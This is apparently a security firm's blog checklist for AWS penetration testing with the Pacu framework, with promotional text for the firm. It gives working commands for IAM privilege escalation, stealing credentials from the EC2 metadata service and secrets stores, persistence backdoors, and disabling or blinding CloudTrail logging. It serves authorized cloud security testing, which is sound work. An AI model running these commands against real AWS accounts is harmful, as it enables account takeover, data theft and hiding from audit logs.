AWS environments are complex, sprawling, and frequently misconfigured. For security professionals, having a structured approach to testing cloud infrastructure is not optional; it is essential. Pacu, the open-source AWS exploitation framework developed by Rhino Security Labs, has become one of the most widely used tools in the cloud pentester's toolkit. This checklist walks through the full Pacu workflow, from installation to privilege escalation and post-exploitation, with real commands you can use in authorized engagements.
If your organization needs expert-led AWS security assessments beyond what automated tooling can cover, the team at Redfox Cybersecurity provides comprehensive cloud penetration testing services tailored to your environment.
Pacu is a modular, Python-based framework built specifically for attacking and auditing AWS environments. It mirrors the design philosophy of Metasploit but is purpose-built for cloud. It works by leveraging AWS API calls using compromised or test credentials, and it organizes its capabilities into modules covering IAM, EC2, S3, Lambda, CloudTrail, and more.
Pacu is used by red teams, bug bounty hunters, and internal security teams to:
Pacu requires Python 3 and pip. Install it from the official repository:
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
pip3 install -r requirements.txt
python3 pacu.py
[cta]
On first launch, Pacu prompts you to create a session. Sessions store all gathered data, credentials, and module output for that engagement.
Once inside the Pacu shell, set your AWS credentials using the set_keys command:
Pacu > set_keys
Key Alias: compromised-user
Access Key ID: AKIAIOSFODNN7EXAMPLE
Secret Access Key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Session Token: (leave blank if not using temporary credentials)
[cta]
You can also import credentials from an existing AWS CLI profile:
Pacu > import_keys default
[cta]
The first phase of any AWS pentest is enumeration. You need to understand what the credentials have access to before attempting exploitation.
Start by confirming who you are in the AWS environment:
Pacu > run iam__detect_honeytokens
Pacu > whoami
[cta]
The whoami command pulls the current caller identity using sts:GetCallerIdentity and displays the ARN, account ID, and user or role details.
Understanding what permissions are attached to your current identity is critical. Pacu automates this with the iam__enum_permissions module:
Pacu > run iam__enum_permissions
[cta]
This module attempts to enumerate all IAM policies attached to the current user or role, including inline and managed policies. It builds a comprehensive picture of what API calls are permitted.
For broader IAM enumeration across the account:
Pacu > run iam__enum_users_roles_policies_groups
[cta]
This pulls all users, roles, groups, and policies visible to the current credentials. Even read-only access here can reveal sensitive role names, overpermissioned policies, and attack paths.
Pacu > run ec2__enum
[cta]
This module enumerates instances, security groups, key pairs, elastic IPs, VPCs, and subnets. It is useful for mapping the network topology and identifying internet-exposed instances.
Pacu > run s3__enum
[cta]
S3 enumeration lists all accessible buckets and attempts to determine their ACLs and public access settings. This is frequently where sensitive data exposure begins in AWS environments.
For a deeper look at specific bucket contents:
Pacu > run s3__download_bucket --bucket-name target-bucket-name
[cta]
IAM privilege escalation is one of the most impactful attack paths in AWS. Pacu includes a dedicated module that checks for over 20 known privilege escalation methods.
Pacu > run iam__privesc_scan
[cta]
This module checks whether the current identity has permissions that can be abused to gain elevated access. Common escalation paths it detects include:
iam:CreatePolicyVersion - replace an existing policy with a more permissive versioniam:AttachUserPolicy - attach the AWS-managed AdministratorAccess policy to yourselfiam:PassRole combined with ec2:RunInstances - launch an EC2 instance with an admin rolelambda:CreateFunction combined with iam:PassRole - deploy a Lambda function that assumes a privileged rolests:AssumeRole - directly assume a misconfigured role with overly permissive trust policiesIf iam:CreatePolicyVersion is available, you can replace an existing policy with one that grants full admin access:
aws iam create-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
--policy-document '{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}' \
--set-as-default
[cta]
If you have iam:PassRole and lambda:CreateFunction, you can escalate by invoking a Lambda function under a privileged execution role:
Pacu > run lambda__backdoor_new_roles
[cta]
This module automatically creates a Lambda function, assigns it a high-privilege role via PassRole, and invokes it to perform privileged actions on your behalf.
For organizations uncertain whether their IAM configurations are vulnerable to these escalation paths, Redfox Cybersecurity offers targeted IAM security reviews as part of its AWS penetration testing engagements.
After gaining elevated access, the next objective is harvesting credentials and secrets stored across the environment.
If you have shell access to an EC2 instance, query the metadata service for temporary credentials:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/RoleName
[cta]
These credentials can then be loaded into Pacu with set_keys for further exploitation.
Pacu > run secretsmanager__enum
[cta]
This module lists all secrets stored in Secrets Manager that the current identity has access to and attempts to retrieve their values. It commonly surfaces database credentials, API keys, and third-party service tokens.
Pacu > run ssm__download_parameters
[cta]
Parameter Store is frequently used to store database connection strings and application credentials. This module retrieves all readable parameters, including SecureString types if KMS decryption permissions are present.
Maintaining access after an engagement or simulating what a real attacker would do requires establishing persistence.
Pacu > run iam__backdoor_users_keys
[cta]
This module creates new access keys for existing IAM users, providing persistent credential access that survives password changes.
Pacu > run iam__backdoor_assume_role
[cta]
This adds a new trusted principal to an existing role's trust policy, allowing an attacker-controlled account or identity to assume the role at will.
Pacu > run lambda__backdoor_new_roles
[cta]
Alternatively, deploy a persistent Lambda function triggered by CloudWatch Events that re-creates deleted access or exfiltrates data on a schedule:
import boto3
def handler(event, context):
iam = boto3.client('iam')
iam.create_access_key(UserName='target-user')
[cta]
A mature red team engagement should also test the organization's ability to detect attacks. Pacu includes modules for evading AWS-native detection mechanisms.
Pacu > run cloudtrail__disable
[cta]
This module identifies active CloudTrail trails and disables them, preventing API activity from being logged. On real engagements, this should only be done with explicit authorization, as it affects the entire account's audit capability.
Pacu > run guardduty__list_accounts
[cta]
This identifies whether GuardDuty is active and which accounts are enrolled. If GuardDuty is disabled or not enrolled in certain regions, those regions become lower-risk areas for attacker activity.
Rather than disabling CloudTrail outright, a more subtle attacker might modify event selectors to exclude specific API calls:
aws cloudtrail put-event-selectors \
--trail-name target-trail \
--event-selectors '[{
"ReadWriteType": "WriteOnly",
"IncludeManagementEvents": false,
"DataResources": []
}]'
[cta]
If enumeration reveals cross-account role relationships, test whether trust policies are overly permissive:
aws sts assume-role \
--role-arn arn:aws:iam::999999999999:role/CrossAccountRole \
--role-session-name pentest-session
[cta]
Load the resulting credentials into Pacu and continue enumeration in the target account.
Pacu > run iam__enum_roles
[cta]
This module attempts to enumerate roles that the current identity may be able to assume, including roles with wildcard or overly broad trust policies.
The following is a quick-reference command list for the most commonly used Pacu modules in an AWS pentest:
iam__enum_permissions - Enumerate current identity permissions
iam__enum_users_roles_policies_groups - Full IAM enumeration
iam__privesc_scan - Check for privilege escalation paths
iam__backdoor_users_keys - Create persistent access keys
iam__backdoor_assume_role - Modify trust policies for persistence
ec2__enum - Enumerate EC2 resources
s3__enum - List and assess S3 buckets
s3__download_bucket - Download bucket contents
secretsmanager__enum - Harvest Secrets Manager values
ssm__download_parameters - Retrieve SSM Parameter Store data
cloudtrail__disable - Disable CloudTrail logging
guardduty__list_accounts - Check GuardDuty enrollment status
lambda__backdoor_new_roles - Backdoor Lambda with privileged roles
[cta]
Pacu provides a structured, modular approach to AWS security testing that maps directly to real-world attack paths. Working through this checklist systematically ensures that enumeration, privilege escalation, credential harvesting, persistence, and detection evasion are all evaluated during an engagement.
Automated tooling like Pacu is powerful, but it works best when paired with human expertise that understands context, business risk, and the nuances of complex AWS architectures. The security professionals at Redfox Cybersecurity combine tool-assisted testing with deep cloud security knowledge to deliver assessments that go well beyond surface-level findings. If your team is preparing for an AWS pentest or wants to validate your current cloud security posture, reach out to Redfox Cybersecurity to get started.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
